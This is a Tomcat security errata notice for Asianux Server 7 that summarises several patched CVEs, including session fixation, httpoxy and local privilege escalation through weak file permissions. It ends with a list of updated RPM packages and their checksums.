tomcat-7.0.54-8.el7
エラータID: AXSA:2016-704:01
Tomcat is the servlet container that is used in the official Reference
Implementation for the Java Servlet and JavaServer Pages technologies.
The Java Servlet and JavaServer Pages specifications are developed by
Sun under the Java Community Process.
Tomcat is developed in an open and participatory environment and
released under the Apache Software License version 2.0. Tomcat is intended
to be a collaboration of the best-of-breed developers from around the world.
Security issues fixed with this release:
CVE-2014-7810
The Expression Language (EL) implementation in Apache Tomcat 6.x
before 6.0.44, 7.x before 7.0.58, and 8.x before 8.0.16 does not
properly consider the possibility of an accessible interface
implemented by an inaccessible class, which allows attackers to bypass
a SecurityManager protection mechanism via a web application that
leverages use of incorrect privileges during EL evaluation.
CVE-2015-5346
Session fixation vulnerability in Apache Tomcat 7.x before 7.0.66, 8.x
before 8.0.30, and 9.x before 9.0.0.M2, when different session
settings are used for deployments of multiple versions of the same web
application, might allow remote attackers to hijack web sessions by
leveraging use of a requestedSessionSSL field for an unintended
request, related to CoyoteAdapter.java and Request.java.
CVE-2016-5388
Apache Tomcat through 8.5.4, when the CGI Servlet is enabled, follows
RFC 3875 section 4.1.18 and therefore does not protect applications
from the presence of untrusted client data in the HTTP_PROXY
environment variable, which might allow remote attackers to redirect
an application's outbound HTTP traffic to an arbitrary proxy server
via a crafted Proxy header in an HTTP request, aka an "httpoxy" issue.
NOTE: the vendor states "A mitigation is planned for future releases
of Tomcat, tracked as CVE-2016-5388"; in other words, this is not a
CVE ID for a vulnerability.
CVE-2016-5425
** RESERVED **
This candidate has been reserved by an organization or individual that
will use it when announcing a new security problem. When the
candidate has been publicized, the details for this candidate will be
provided.
CVE-2016-6325
** RESERVED **
This candidate has been reserved by an organization or individual that
will use it when announcing a new security problem. When the
candidate has been publicized, the details for this candidate will be
provided.
Update packages.
The Expression Language (EL) implementation in Apache Tomcat 6.x before 6.0.44, 7.x before 7.0.58, and 8.x before 8.0.16 does not properly consider the possibility of an accessible interface implemented by an inaccessible class, which allows attackers to bypass a SecurityManager protection mechanism via a web application that leverages use of incorrect privileges during EL evaluation.
Session fixation vulnerability in Apache Tomcat 7.x before 7.0.66, 8.x before 8.0.30, and 9.x before 9.0.0.M2, when different session settings are used for deployments of multiple versions of the same web application, might allow remote attackers to hijack web sessions by leveraging use of a requestedSessionSSL field for an unintended request, related to CoyoteAdapter.java and Request.java.
Apache Tomcat 7.x through 7.0.70 and 8.x through 8.5.4, when the CGI Servlet is enabled, follows RFC 3875 section 4.1.18 and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, aka an "httpoxy" issue. NOTE: the vendor states "A mitigation is planned for future releases of Tomcat, tracked as CVE-2016-5388"; in other words, this is not a CVE ID for a vulnerability.
The Tomcat package on Red Hat Enterprise Linux (RHEL) 7, Fedora, CentOS, Oracle Linux, and possibly other Linux distributions uses weak permissions for /usr/lib/tmpfiles.d/tomcat.conf, which allows local users to gain root privileges by leveraging membership in the tomcat group.
The Tomcat package on Red Hat Enterprise Linux (RHEL) 5 through 7, JBoss Web Server 3.0, and JBoss EWS 2 uses weak permissions for (1) /etc/sysconfig/tomcat and (2) /etc/tomcat/tomcat.conf, which allows local users to gain privileges by leveraging membership in the tomcat group.
N/A
SRPMS
- tomcat-7.0.54-8.el7.src.rpm
MD5: b021480fa3a2944d64d840be46c6f082
SHA-256: 073488f1ad7c4870b9d56cd3a1e55a7abea53874205b977ec2d4e812f460d8be
Size: 4.46 MB
Asianux Server 7 for x86_64
- tomcat-7.0.54-8.el7.noarch.rpm
MD5: 0df7f4ed30c4345117bb7e096902868f
SHA-256: 4b45b50049d22645cd669dbceb5a808192f01d0d0ae707e687085c4efdea8741
Size: 84.30 kB - tomcat-admin-webapps-7.0.54-8.el7.noarch.rpm
MD5: a326a58fe136eca7608d026f44d29a91
SHA-256: c9eff73882575e7d08685a4138fc89755223cb705a99458af6a76770bedd4bbf
Size: 37.64 kB - tomcat-el-2.2-api-7.0.54-8.el7.noarch.rpm
MD5: 871b9589af47dc5549a21d060769d7cd
SHA-256: 4ae2722a245675015b9e60ac00cca2a7cd3178a84c0c651c1d7af8290c141446
Size: 76.30 kB - tomcat-jsp-2.2-api-7.0.54-8.el7.noarch.rpm
MD5: 6a3c8b96e9359e8e7791c0663dc9ff8d
SHA-256: 21257f6a2e47e7f3fc49786f7d30924506409aeea27692946f4a956d54070ebf
Size: 89.71 kB - tomcat-lib-7.0.54-8.el7.noarch.rpm
MD5: 70d60f8f41fbbc199326df8010b70dd2
SHA-256: 74f65f345884d88612a46202bc61b5456368611833a72186fca4e77132d0b1c4
Size: 3.67 MB - tomcat-servlet-3.0-api-7.0.54-8.el7.noarch.rpm
MD5: 5314dd3d6e6a2d28212c534d4ac7b940
SHA-256: 7aa5e6af967c8080ebe570c6b5a499a5b24cd1f3a40f4a5c8de8f6e1aef00912
Size: 206.92 kB - tomcat-webapps-7.0.54-8.el7.noarch.rpm
MD5: e7820a4d441dfa8a450bbec5e615e5c9
SHA-256: 0aad3841a83b508dd17e13f39842976ea018a1aa78904f6c748f4527ef80b958
Size: 350.93 kB
日本語